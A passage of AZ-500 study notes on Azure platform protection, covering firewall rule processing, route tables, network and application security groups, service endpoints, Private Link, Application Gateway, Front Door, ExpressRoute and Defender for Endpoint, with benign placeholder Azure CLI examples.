        • Qualified domain tags\u00a0- Fully Qualified Domain Names (FQDN) tags make it easier for you to allow well known Azure service network traffic through your firewall. For example, say you want to allow Windows Update network traffic through your firewall. You create an application rule and include the Windows Update tag. Now network traffic from Windows Update can flow through your firewall.
        • Outbound Source Network Address Translation (OSNAT) support\u00a0- All outbound virtual network traffic IP addresses are translated to the Azure Firewall public IP. You can identify and allow traffic originating from your virtual network to remote internet destinations.
        • Inbound Destination Network Address Translation (DNAT) support\u00a0- Inbound network traffic to your firewall public IP address is translated and filtered to the private IP addresses on your virtual networks.
        • Azure Monitor logging\u00a0- All events are integrated with Azure Monitor, allowing you to archive logs to a storage account, stream events to your Event Hub, or send them to Azure Monitor logs.

        Flow of rules for inbound traffic: Grouping the features above into logical groups reveals that Azure Firewall has three rule types:\u00a0NAT rules,\u00a0network rules, and\u00a0application rules. Network rules are applied first, then application rules. Rules are terminating, which means if a match is found in network rules, then application rules are not processed. If there\u2019s no network rule match, and if the packet protocol is HTTP/HTTPS, the packet is then evaluated by the application rules. If no match continues to be found, then the packet is evaluated against the infrastructure rule collection. If there\u2019s still no match, then the packet is denied by default.

        NAT rules - Inbound Destination Network Address Translation (DNAT). Filter inbound traffic with Azure Firewall DNAT using the Azure portal. DNAT rules are applied first. If a match is found, an implicit corresponding network rule to allow the translated traffic is added. You can override this behavior by explicitly adding a network rule collection with deny rules that match the translated traffic. No application rules are applied for these connections.

        Network rules - Grant access from a virtual network. You can configure storage accounts to allow access only from specific VNets. You enable a service endpoint for Azure Storage within the VNet. This endpoint gives traffic an optimal route to the Azure Storage service. The identities of the virtual network and the subnet are also transmitted with each request. Administrators can then configure network rules for the storage account that allow requests to be received from specific subnets in the VNet. Each storage account supports up to 100 virtual network rules, which could be combined with IP network rules.

        Application rules - Firewall rules to secure Azure Storage When network rules are configured, only applications requesting data from over the specified set of networks can access a storage account. An application that accesses a storage account when network rules are in effect requires proper authorization on the request. Authorization is supported with Azure AD credentials for blobs and queues, a valid account access key, or a SAS token. By default, storage accounts accept connections from clients on any network. To limit access to selected networks, you must first change the default action. Making changes to network rules can impact your applications' ability to connect to Azure Storage. Setting the default network rule to Deny blocks all access to the data unless specific network rules that grant access are also applied. Be sure to grant access to any allowed networks using network rules before you change the default rule to deny access.

        Controlling outbound and inbound network access is an important part of an overall network security plan. Network traffic is subjected to the configured firewall rules when you route your network traffic to the firewall as the default gateway.

        One way you can control outbound network access from an Azure subnet is with Azure Firewall. With Azure Firewall, you can configure:

        • Application rules that define fully qualified domain names (FQDNs) that can be accessed from a subnet.
        • Network rules that define source address, protocol, destination port, and destination address.

        Fully Qualified Domain Name (FQDN) tag: An FQDN tag represents a group of fully qualified domain names (FQDNs) associated with well known Microsoft services. You can use an FQDN tag in application rules to allow the required outbound network traffic through your firewall.
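
        A hypothetical application rule that uses the WindowsUpdate FQDN tag; this assumes the azure-firewall CLI extension and an existing firewall, and all resource names are placeholders.

        az extension add --name azure-firewall
        az network firewall application-rule create \
          --resource-group rg-net \
          --firewall-name fw-hub \
          --collection-name app-allow \
          --name allow-windows-update \
          --priority 200 \
          --action Allow \
          --protocols Http=80 Https=443 \
          --source-addresses 10.0.1.0/24 \
          --fqdn-tags WindowsUpdate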

        Infrastructure qualified domain names: Azure Firewall includes a built-in rule collection for infrastructure FQDNs that are allowed by default. These FQDNs are specific for the platform and can't be used for other purposes. The following services are included in the built-in rule collection:

        • Compute access to storage Platform Image Repository (PIR)
        • Managed disks status storage access
        • Azure Diagnostics and Logging (MDS)

        You can monitor Azure Firewall using firewall logs. You can also use activity logs to audit operations on Azure Firewall resources. You can access some of these logs through the portal. Logs can be sent to Azure Monitor logs, Storage, and Event Hubs and analyzed in Azure Monitor logs or by different tools such as Excel and Power BI. Metrics are lightweight and can support near real-time scenarios making them useful for alerting and fast issue detection.

        Threat intelligence-based filtering can be enabled for your firewall to alert and deny traffic from/to known malicious IP addresses and domains. The IP addresses and domains are sourced from the Microsoft Threat Intelligence feed. Intelligent Security Graph powers Microsoft threat intelligence and is used by multiple services including Microsoft Defender for Cloud. If you've enabled threat intelligence-based filtering, the associated rules are processed before any of the NAT rules, network rules, or application rules. You can choose to just log an alert when a rule is triggered, or you can choose alert and deny mode. By default, threat intelligence-based filtering is enabled in alert mode.

        Rule processing logic: You can configure NAT rules, network rules, and application rules on Azure Firewall. Rule collections are processed according to the rule type in priority order, lower numbers to higher numbers, from 100 to 65,000. A rule collection name can have only letters, numbers, underscores, periods, or hyphens. It must begin with a letter or number, and end with a letter, number, or underscore. The maximum name length is 80 characters.

        Service tags represent a group of IP address prefixes to help minimize complexity for security rule creation. Microsoft manages the address prefixes encompassed by the service tag, and automatically updates the service tag as addresses change. Azure Firewall service tags can be used in the network rules destination field. You can use them in place of specific IP addresses.

        Remote work support - Employees aren't protected by the layered security policies associated with on-premises services while working from home. Virtual Desktop Infrastructure (VDI) deployments on Azure can help organizations rapidly respond to this changing environment. However, you need a way to protect inbound/outbound Internet access to and from these VDI deployments. You can use Azure Firewall DNAT rules along with its threat intelligence-based filtering capabilities to protect your VDI deployments. Azure Virtual Desktop is a comprehensive desktop and app virtualization service running in Azure. It\u2019s the only virtual desktop infrastructure (VDI) that delivers simplified management, multi-session Windows 10, optimizations for Microsoft 365 ProPlus, and support for Remote Desktop Services (RDS) environments.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#14-configure-vpn-forced-tunneling","title":"1.4. Configure VPN forced tunneling","text":"

        You configure forced tunneling in Azure via virtual network User Defined Routes (UDR). Redirecting traffic to an on-premises site is expressed as a default route to the Azure VPN gateway. This example uses UDRs to create a routing table to first add a default route and then associate the routing table with your virtual network subnets to enable forced tunneling on those subnets.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#15-create-user-defined-routes-and-network-virtual-appliances","title":"1.5. Create User Defined Routes and Network Virtual Appliances","text":"

        A User Defined Route (UDR) is a custom route in Azure that overrides Azure's default system routes or adds routes to a subnet's route table. In Azure, you create a route table and then associate that route table with zero or more virtual network subnets.
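
        A minimal sketch of a UDR that forces all outbound traffic through a network virtual appliance; the names, prefixes, and NVA address 10.0.2.4 are placeholders.

        az network route-table create --resource-group rg-net --name rt-forced
        az network route-table route create \
          --resource-group rg-net \
          --route-table-name rt-forced \
          --name default-to-nva \
          --address-prefix 0.0.0.0/0 \
          --next-hop-type VirtualAppliance \
          --next-hop-ip-address 10.0.2.4
        # Associate the route table with a subnet to activate the route
        az network vnet subnet update \
          --resource-group rg-net \
          --vnet-name vnet-hub \
          --name snet-app \
          --route-table rt-forced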

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#2-network-security","title":"2. Network security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#21-network-security-groups-nsg","title":"2.1. Network Security Groups (NSG)","text":"

        Network traffic can be filtered to and from Azure resources in an Azure virtual network with a\u00a0network security group. A network security group contains security rules that allow or deny inbound network traffic to, or outbound network traffic from, several types of Azure resources. For each rule, you can specify source and destination, port, and protocol.

        NSGs control inbound and outbound traffic passing through a network adapter (in the Resource Manager deployment model), a VM (in the classic deployment model), or a subnet (in both deployment models).

        Network Security Group rules

        • Name. This is a unique identifier for the rule.
        • Direction. This specifies whether the traffic is inbound or outbound.
        • Priority. If multiple rules match the traffic, rules with a higher priority apply.
        • Access. This specifies whether the traffic is allowed or denied.
        • Source IP address prefix. This prefix identifies where the traffic originated from. It can be based on a single IP address; a range of IP addresses in Classless Interdomain Routing (CIDR) notation; or the asterisk (*), which is a wildcard that matches all possible IP addresses.
        • Source port range. This specifies source ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
        • Destination IP address prefix. This identifies the traffic destination based on a single IP address, a range of IP addresses in CIDR notation, or the asterisk (*) to match all possible IP addresses.
        • Destination port range. This specifies destination ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
        • Protocol. This specifies a protocol that matches the rule. It can be UDP, TCP, or the asterisk (*).

        Predefined default rules exist for inbound and outbound traffic. You can\u2019t delete these rules, but you can override them, because they have the lowest priority.

        The default rules allow all inbound and outbound traffic within a virtual network, allow outbound traffic towards the internet, and allow inbound traffic to an Azure load balancer.

        When you create a custom rule, you can use default tags in the source and destination IP address prefixes to specify predefined categories of IP addresses. These default tags are:

        • Internet. This tag represents internet IP addresses.
        • Virtual_network. This tag identifies all IP addresses that the IP range for the virtual network defines. It also includes IP address ranges from on-premises networks when they are defined as local network to virtual network.
        • Azure_loadbalancer. This tag specifies the default Azure load balancer destination.

        You can design NSGs to isolate virtual networks in security zones, like the model used by on-premises infrastructure does. You can apply NSGs to subnets, which allows you to create protected screened subnets, or DMZs, that can restrict traffic flow to all the machines residing within that subnet. With the classic deployment model, you can also assign NSGs to individual computers to control traffic that is both destined for and leaving the VM. With the Resource Manager deployment model, you can assign NSGs to a network adapter so that NSG rules control only the traffic that flows through that network adapter. If the VM has multiple network adapters, NSG rules won\u2019t automatically be applied to traffic that is designated for other network adapters.

        Network Security Group limitations

        When implementing NSGs, these are the limits to keep in mind:

        • By default, you can create 100 NSGs per region per subscription. You can raise this limit to 400 by contacting Azure support.
        • You can apply only one NSG to a VM, subnet, or network adapter.
        • By default, you can have up to 200 rules in a single NSG. You can raise this limit to 500 by contacting Azure support.
        • You can apply an NSG to multiple resources.

        An individual subnet can have zero, or one, associated NSG. An individual network interface can also have zero, or one, associated NSG. So, you can effectively have dual traffic restriction for a virtual machine by associating an NSG first to a subnet, and then another NSG to the VM's network interface.

        Consider a simple example with one virtual machine as follows:

        • The virtual machine is placed inside the Contoso Subnet.
        • Contoso Subnet is associated with Subnet NSG.
        • The VM network interface is additionally associated with VM NSG.

        In this example, for inbound traffic, the Subnet NSG is evaluated first. Any traffic allowed through Subnet NSG is then evaluated by VM NSG. The reverse is applicable for outbound traffic, with VM NSG being evaluated first. Any traffic allowed through VM NSG is then evaluated by Subnet NSG.
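
        A minimal NSG sketch using the rule fields described above; all names and values are placeholders.

        az network nsg create --resource-group rg-net --name nsg-app
        # Allow HTTPS in from the Internet tag; everything else falls through to the default rules
        az network nsg rule create \
          --resource-group rg-net \
          --nsg-name nsg-app \
          --name allow-https-in \
          --priority 100 \
          --direction Inbound \
          --access Allow \
          --protocol Tcp \
          --source-address-prefixes Internet \
          --destination-port-ranges 443
        az network vnet subnet update \
          --resource-group rg-net \
          --vnet-name vnet-hub \
          --name snet-app \
          --network-security-group nsg-app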

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#22-application-security-groups","title":"2.2. Application Security Groups","text":"

        In this topic we look at Application Security Groups (ASGs), which are built on network security groups. ASGs enable you to configure network security as a natural extension of an application's structure. You then can group VMs and define network security policies based on those groups.

        The rules that specify an ASG as the source or destination are only applied to the network interfaces that are members of the ASG. If the network interface is not a member of an ASG, the rule is not applied to the network interface even though the network security group is associated to the subnet.
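
        A hypothetical sketch of an ASG used as the destination of an NSG rule; the names are placeholders, and network interfaces still have to be joined to the ASG (for example with az network nic ip-config update --application-security-groups).

        az network asg create --resource-group rg-net --name asg-web
        az network nsg rule create \
          --resource-group rg-net \
          --nsg-name nsg-app \
          --name allow-web-to-asg \
          --priority 110 \
          --direction Inbound \
          --access Allow \
          --protocol Tcp \
          --source-address-prefixes Internet \
          --destination-asgs asg-web \
          --destination-port-ranges 80 443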

        Application security groups have the following constraints

        • There are limits to the number of ASGs you can have in a subscription, in addition to other limits related to ASGs.
        • You can specify one ASG as the source and destination in a security rule. You cannot specify multiple ASGs in the source or destination.
        • All network interfaces assigned to an ASG must exist in the same virtual network that the first network interface assigned to the ASG is in. For example, if the first network interface assigned to an ASG named AsgWeb is in the virtual network named VNet1, then all subsequent network interfaces assigned to ASGWeb must exist in VNet1. You cannot add network interfaces from different virtual networks to the same ASG.
        • If you specify an ASG as the source and destination in a security rule, the network interfaces in both ASGs must exist in the same virtual network. For example, if AsgLogic contained network interfaces from VNet1, and AsgDb contained network interfaces from VNet2, you could not assign AsgLogic as the source and AsgDb as the destination in a rule. All network interfaces for both the source and destination ASGs need to exist in the same virtual network.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#23-service-endpoints","title":"2.3. Service Endpoints","text":"

        A virtual network service endpoint provides the identity of your virtual network to the Azure service. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources.

        Today, Azure service traffic from a virtual network uses public IP addresses as source IP addresses. With service endpoints, service traffic switches to use virtual network private addresses as the source IP addresses when accessing the Azure service from a virtual network. This switch allows you to access the services without the need for reserved, public IP addresses used in IP firewalls.
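
        A minimal sketch of enabling a storage service endpoint on a subnet and then restricting a storage account to it; all names are placeholders and the account is assumed to live in the same resource group.

        az network vnet subnet update \
          --resource-group rg-net \
          --vnet-name vnet-hub \
          --name snet-app \
          --service-endpoints Microsoft.Storage
        # Deny by default, then allow only the subnet
        az storage account update --resource-group rg-net --name stdemo001 --default-action Deny
        az storage account network-rule add \
          --resource-group rg-net \
          --account-name stdemo001 \
          --vnet-name vnet-hub \
          --subnet snet-app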

        Why use a service endpoint?

        • Improved security for your Azure service resources. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources. This provides improved security by fully removing public Internet access to resources, and allowing traffic only from your virtual network.
        • Optimal routing for Azure service traffic from your virtual network. Today, any routes in your virtual network that force Internet traffic to your premises and/or virtual appliances, known as forced-tunneling, also force Azure service traffic to take the same route as the Internet traffic. Service endpoints provide optimal routing for Azure traffic.
        • Endpoints always take service traffic directly from your virtual network to the service on the Microsoft Azure backbone network. Keeping traffic on the Azure backbone network allows you to continue auditing and monitoring outbound Internet traffic from your virtual networks, through forced-tunneling, without impacting service traffic.
        • Simple to set up with less management overhead. You no longer need reserved, public IP addresses in your virtual networks to secure Azure resources through IP firewall. There are no NAT or gateway devices required to set up the service endpoints. Service endpoints are configured through a simple click on a subnet. There is no additional overhead to maintaining the endpoints.

        Scenarios

        • Peered, connected, or multiple virtual networks: To secure Azure services to multiple subnets within a virtual network or across multiple virtual networks, you can enable service endpoints on each of the subnets independently, and secure Azure service resources to all of the subnets.
        • Filtering outbound traffic from a virtual network to Azure services: If you want to inspect or filter the traffic sent to an Azure service from a virtual network, you can deploy a network virtual appliance within the virtual network. You can then apply service endpoints to the subnet where the network virtual appliance is deployed, and secure Azure service resources only to this subnet. This scenario might be helpful if you want use network virtual appliance filtering to restrict Azure service access from your virtual network only to specific Azure resources.
        • Securing Azure resources to services deployed directly into virtual networks: You can directly deploy various Azure services into specific subnets in a virtual network. You can secure Azure service resources to managed service subnets by setting up a service endpoint on the managed service subnet.
        • Disk traffic from an Azure virtual machine: Virtual Machine Disk traffic for managed and unmanaged disks isn't affected by service endpoint routing changes for Azure Storage. This traffic includes disk I/O as well as mount and unmount. You can limit REST access to page blobs to select networks through service endpoints and Azure Storage network rules.
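
        As an illustration of the flow described above, here is a minimal Azure CLI sketch (all resource names are placeholders) that enables a storage service endpoint on a subnet and then secures a storage account to that subnet with a virtual network rule:

        # Enable the Microsoft.Storage service endpoint on an existing subnet
        az network vnet subnet update \
          --resource-group MyRg \
          --vnet-name MyVnet \
          --name MySubnet \
          --service-endpoints Microsoft.Storage

        # Deny public access by default, then allow traffic only from that subnet
        az storage account update \
          --resource-group MyRg \
          --name mystorageacct \
          --default-action Deny

        az storage account network-rule add \
          --resource-group MyRg \
          --account-name mystorageacct \
          --vnet-name MyVnet \
          --subnet MySubnet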
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#24-private-links","title":"2.4. Private links","text":"

        Azure Private Link works on an approval call flow model wherein the Private Link service consumer can request a connection to the service provider for consuming the service. The service provider can then decide whether to allow the consumer to connect or not. Azure Private Link enables the service providers to manage the private endpoint connection on their resources.

        There are two connection approval methods that a Private Link service consumer can choose from:

        • Automatic: If the service consumer has RBAC permissions on the service provider resource, the consumer can choose the automatic approval method. In this case, when the request reaches the service provider resource, no action is required from the service provider and the connection is automatically approved.
        • Manual: On the contrary, if the service consumer doesn\u2019t have RBAC permissions on the service provider resource, the consumer can choose the manual approval method. In this case, the connection request appears on the service resources as Pending. The service provider has to manually approve the request before connections can be established. In manual cases, service consumer can also specify a message with the request to provide more context to the service provider.

        The service provider has the following options to choose from for all Private Endpoint connections:

        • Approve
        • Reject
        • Remove

        The Azure portal is the preferred method for managing private endpoint connections on Azure PaaS resources.
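
        A minimal Azure CLI sketch of the consumer side (names are placeholders, and the provider resource ID must be filled in); --manual-request forces the manual approval flow so the provider sees the connection as Pending:

        az network private-endpoint create \
          --resource-group MyRg \
          --name MyPrivateEndpoint \
          --vnet-name MyVnet \
          --subnet MySubnet \
          --private-connection-resource-id "<resource-id-of-the-provider-service>" \
          --group-id blob \
          --connection-name MyConnection \
          --manual-request true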

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#25-azure-application-gateway","title":"2.5. Azure application gateway","text":"

        Azure Application Gateway is a web traffic load balancer that enables you to manage traffic to your web applications. Traditional load balancers operate at the transport layer (OSI layer 4 - TCP and UDP) and route traffic based on the source IP address and port to a destination IP address and port.

        Application Gateway can make routing decisions based on additional attributes of an HTTP request, for example, URI path or host headers. \u00a0For example, you can route traffic based on the incoming URL. So if /images are in the incoming URL, you can route traffic to a specific set of servers (known as a pool) configured for images. If /video is in the URL, that traffic is routed to another pool that's optimized for videos. This type of routing is known as application layer (OSI layer 7) load balancing.

        Application Gateway includes the following features:

        • Secure Sockets Layer (SSL/TLS) termination\u00a0- Application gateway supports SSL/TLS termination at the gateway, after which traffic typically flows unencrypted to the backend servers. This feature allows web servers to be unburdened from costly encryption and decryption overhead.
        • Autoscaling\u00a0- Application Gateway Standard_v2 supports autoscaling and can scale up or down based on changing traffic load patterns. Autoscaling also removes the requirement to choose a deployment size or instance count during provisioning.
        • Zone redundancy\u00a0- A Standard_v2 Application Gateway can span multiple Availability Zones, offering better fault resiliency and removing the need to provision separate Application Gateways in each zone.
        • Static VIP\u00a0- The application gateway Standard_v2 SKU supports static VIP type exclusively. This ensures that the VIP associated with application gateway doesn't change even over the lifetime of the Application Gateway.
        • Web Application Firewall\u00a0- Web Application Firewall (WAF) is a service that provides centralized protection of your web applications from common exploits and vulnerabilities. WAF is based on rules from the OWASP (Open Web Application Security Project) core rule sets 3.1 (WAF_v2 only), 3.0, and 2.2.9.
        • Ingress Controller for AKS\u00a0- Application Gateway Ingress Controller (AGIC) allows you to use Application Gateway as the ingress for an Azure Kubernetes Service (AKS) cluster.
        • URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to back-end server pools based on URL Paths of the request. One of the scenarios is to route requests for different content types to different pools.
        • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same application gateway instance. This feature allows you to configure a more efficient topology for your deployments by adding up to 100 web sites to one Application Gateway (for optimal performance).
        • Redirection\u00a0- A common scenario for many web applications is to support automatic HTTP to HTTPS redirection to ensure all communication between an application and its users occurs over an encrypted path.
        • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same server.
        • Websocket and HTTP/2 traffic\u00a0- Application Gateway provides native support for the WebSocket and HTTP/2 protocols. There's no user-configurable setting to selectively enable or disable WebSocket support.
        • Connection draining\u00a0- Connection draining helps you achieve graceful removal of backend pool members during planned service updates.
        • Custom error pages\u00a0- Application Gateway allows you to create custom error pages instead of displaying default error pages. You can use your own branding and layout using a custom error page.
        • Rewrite HTTP headers\u00a0- HTTP headers allow the client and server to pass additional information with the request or the response.
        • Sizing\u00a0- Application Gateway Standard_v2 can be configured for autoscaling or fixed size deployments. This SKU doesn't offer different instance sizes.

        New Application Gateway v1 SKU deployments can take up to 20 minutes to provision. Changes to instance size or count aren't disruptive, and the gateway remains active during this time.

        Most deployments that use the v2 SKU take around 6 minutes to provision. However, it can take longer depending on the type of deployment. For example, deployments across multiple Availability Zones with many instances can take more than 6 minutes.
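
        A minimal Azure CLI sketch of a Standard_v2 gateway deployment (all names and backend IPs are placeholders; the public IP referenced must be a Standard SKU address):

        az network application-gateway create \
          --resource-group MyRg \
          --name MyAppGateway \
          --sku Standard_v2 \
          --capacity 2 \
          --vnet-name MyVnet \
          --subnet AppGwSubnet \
          --public-ip-address MyAppGwPublicIP \
          --servers 10.0.1.4 10.0.1.5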

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#26-web-application-firewall","title":"2.6. Web Application Firewall","text":"

        Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities. Web applications are increasingly targeted by malicious attacks that exploit commonly known vulnerabilities. SQL injection and cross-site scripting are among the most common attacks.

        WAF can be deployed with Azure Application Gateway, Azure Front Door, and Azure Content Delivery Network (CDN) service from Microsoft. WAF on Azure CDN is currently under public preview. WAF has features that are customized for each specific service.
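
        As a sketch, a standalone WAF policy can be created with the Azure CLI and later associated with an Application Gateway or Front Door (names are placeholders):

        # Create a WAF policy; managed rule sets can then be tuned per service
        az network application-gateway waf-policy create \
          --resource-group MyRg \
          --name MyWafPolicy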

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#27-azure-front-door","title":"2.7. Azure Front Door","text":"

        Azure Front Door enables you to define, manage, and monitor the global routing for your web traffic by optimizing for best performance and instant global failover for high availability. With Front Door, you can transform your global (multi-region) consumer and enterprise applications into robust, high-performance personalized modern applications, APIs, and content that reaches a global audience with Azure.

        Front Door works at Layer 7 (the HTTP/HTTPS layer) and uses a split TCP-based anycast protocol.

        The following features are included with Front Door:

        • Accelerate application performance\u00a0- Using split TCP-based anycast protocol, Front Door ensures that your end users promptly connect to the nearest Front Door POP (Point of Presence).
        • Increase application availability with smart health probes\u00a0- Front Door delivers high availability for your critical applications using its smart health probes, monitoring your backends for both latency and availability and providing instant automatic failover when a backend goes down.
        • URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to backend pools based on URL paths of the request. One of the scenarios is to route requests for different content types to different backend pools.
        • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same Front Door configuration.
        • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same application backend.
        • TLS termination\u00a0- Front Door supports TLS termination at the edge; that is, individual users can set up a TLS connection with Front Door environments instead of establishing it over long-haul connections with the application backend.
        • Custom domains and certificate management\u00a0- When you use Front Door to deliver content, a custom domain is necessary if you would like your own domain name to be visible in your Front Door URL.
        • Application layer security\u00a0- Azure Front Door allows you to author custom Web Application Firewall (WAF) rules for access control to protect your HTTP/HTTPS workload from exploitation based on client IP addresses, country code, and http parameters.
        • URL redirection\u00a0- With the strong industry push on supporting only secure communication, web applications are expected to automatically redirect any HTTP traffic to HTTPS.
        • URL rewrite\u00a0- Front Door supports URL rewrite by allowing you to configure an optional Custom Forwarding Path to use when constructing the request to forward to the backend.
        • Protocol support - IPv6 and HTTP/2 traffic\u00a0- Azure Front Door natively supports end-to-end IPv6 connectivity and HTTP/2 protocol.

        As mentioned above, routing to the Azure Front Door environments leverages Anycast for both DNS (Domain Name System) and HTTP (Hypertext Transfer Protocol) traffic, so user traffic will go to the closest environment in terms of network topology (fewest hops). This architecture typically offers better round-trip times for end users (maximizing the benefits of Split TCP). Front Door organizes its environments into primary and fallback \"rings\". The outer ring has environments that are closer to users, offering lower latencies. The inner ring has environments that can handle the failover for the outer ring environment in case an issue happens. The outer ring is the preferred target for all traffic, but the inner ring is necessary to handle traffic overflow from the outer ring. In terms of VIPs (Virtual Internet Protocol addresses), each frontend host, or domain served by Front Door is assigned a primary VIP, which is announced by environments in both the inner and outer ring, as well as a fallback VIP, which is only announced by environments in the inner ring.
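
        A minimal sketch of standing up a Front Door profile and endpoint, assuming the az afd command group available in recent Azure CLI versions (all names are placeholders):

        az afd profile create \
          --resource-group MyRg \
          --profile-name MyFrontDoor \
          --sku Standard_AzureFrontDoor

        az afd endpoint create \
          --resource-group MyRg \
          --profile-name MyFrontDoor \
          --endpoint-name my-endpoint \
          --enabled-state Enabled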

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#28-expressroute","title":"2.8. ExpressRoute","text":"

        ExpressRoute\u00a0is a direct, private connection from your WAN (not over the public Internet) to Microsoft Services, including Azure. Site-to-Site VPN traffic travels encrypted over the public Internet. Being able to configure Site-to-Site VPN and ExpressRoute connections for the same virtual network has several advantages.

        You can configure a Site-to-Site VPN as a secure failover path for ExpressRoute, or use Site-to-Site VPNs to connect to sites that are not part of your network, but that are connected through ExpressRoute. Notice that this configuration requires two virtual network gateways for the same virtual network, one using the gateway type 'Vpn', and the other using the gateway type 'ExpressRoute'.

        IPsec over ExpressRoute for Virtual WAN

        Azure Virtual WAN uses an Internet Protocol Security (IPsec) Internet Key Exchange (IKE) VPN connection from your on-premises network to Azure over the private peering of an Azure ExpressRoute circuit. This technique can provide an encrypted transit between the on-premises networks and Azure virtual networks over ExpressRoute, without going over the public internet or using public IP addresses. The following diagram shows an example of VPN connectivity over ExpressRoute private peering.

        An important aspect of this configuration is routing between the on-premises networks and Azure over both the ExpressRoute and VPN paths.

        Point-to-point encryption by MACsec - MACsec is an IEEE standard. It encrypts data at the Media Access Control (MAC) level, or Network Layer 2. You can use MACsec to encrypt the physical links between your network devices and Microsoft's network devices when you connect to Microsoft via ExpressRoute Direct. MACsec is disabled on ExpressRoute Direct ports by default. You bring your own MACsec key for encryption and store it in Azure Key Vault. You decide when to rotate the key.

        End-to-end encryption by IPsec and MACsec - IPsec is an IETF standard. It encrypts data at the Internet Protocol (IP) level, or Network Layer 3. You can use IPsec to encrypt an end-to-end connection between your on-premises network and your virtual network (VNET) on Azure. MACsec secures the physical connections between you and Microsoft. IPsec secures the end-to-end connection between you and your virtual networks on Azure. You can enable them independently.

        ExpressRoute Direct gives you the ability to connect directly into Microsoft's global network at peering locations strategically distributed across the world. ExpressRoute Direct provides dual 100 Gbps or 10 Gbps connectivity, which supports Active/Active connectivity at scale.

        Key features that ExpressRoute Direct provides include, but aren't limited to:

        • Massive Data Ingestion into services like Storage and Cosmos DB
        • Physical isolation for industries that are regulated and require dedicated and isolated connectivity like: Banking, Government, and Retail
        • Granular control of circuit distribution based on business unit

        ExpressRoute Direct supports massive data ingestion scenarios into Azure storage and other big data services. ExpressRoute circuits on 100 Gbps ExpressRoute Direct now also support 40 Gbps and 100 Gbps circuit SKUs. The physical port pairs are 100 or 10 Gbps only and can have multiple virtual circuits.

        ExpressRoute Direct supports both QinQ and Dot1Q VLAN tagging.

        • QinQ VLAN Tagging\u00a0allows for isolated routing domains on a per ExpressRoute circuit basis. Azure dynamically allocates an S-Tag at circuit creation and cannot be changed. Each peering on the circuit (Private and Microsoft) will utilize a unique C-Tag as the VLAN. The C-Tag is not required to be unique across circuits on the ExpressRoute Direct ports.
        • Dot1Q VLAN Tagging\u00a0allows for a single tagged VLAN on a per ExpressRoute Direct port pair basis. A C-Tag used on a peering must be unique across all circuits and peerings on the ExpressRoute Direct port pair.

        ExpressRoute Direct provides the same enterprise-grade SLA with Active/Active redundant connections into the Microsoft Global Network. ExpressRoute infrastructure is redundant and connectivity into the Microsoft Global Network is redundant and diverse and scales accordingly with customer requirements.
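
        A minimal Azure CLI sketch for ordering a standard (provider-based) ExpressRoute circuit; the peering location, provider, and names are placeholder values:

        az network express-route create \
          --resource-group MyRg \
          --name MyCircuit \
          --peering-location "Silicon Valley" \
          --provider "Equinix" \
          --bandwidth 200 \
          --sku-family MeteredData \
          --sku-tier Standard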

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#3-host-security","title":"3. Host security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#31-endpoint-protection","title":"3.1. Endpoint protection","text":"

        Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.

        The capabilities on non-Windows platforms may be different from the ones for Windows.

        Defender for Endpoint uses the following combination of technology built into Windows 10 and Microsoft's robust cloud service:

        • Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and process behavioral signals from the operating system and send this sensor data to your private, isolated cloud instance of Microsoft Defender for Endpoint.
        • Cloud security analytics: Leveraging big data, device learning, and unique Microsoft optics across the Windows ecosystem, enterprise cloud products (such as Office 365), and online assets, behavioral signals are translated into insights, detections, and recommended responses to advanced threats.
        • Threat intelligence: Generated by Microsoft hunters, security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures and generate alerts when they are observed in collected sensor data.

        Some features of Microsoft Defender for Endpoint:

        Core Defender Vulnerability Management - Built-in core vulnerability management capabilities use a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.

        Attack surface reduction - The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring configuration settings are properly set and exploit mitigation techniques are applied, the capabilities resist attacks and exploitation. This set of capabilities also includes network protection and web protection, which regulate access to malicious IP addresses, domains, and URLs.

        Next-generation protection - To further reinforce the security perimeter of your network, Microsoft Defender for Endpoint uses next-generation protection designed to catch all types of emerging threats.

        Endpoint detection and response - Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars. Advanced hunting provides a query-based threat-hunting tool that lets you proactively find breaches and create custom detections.

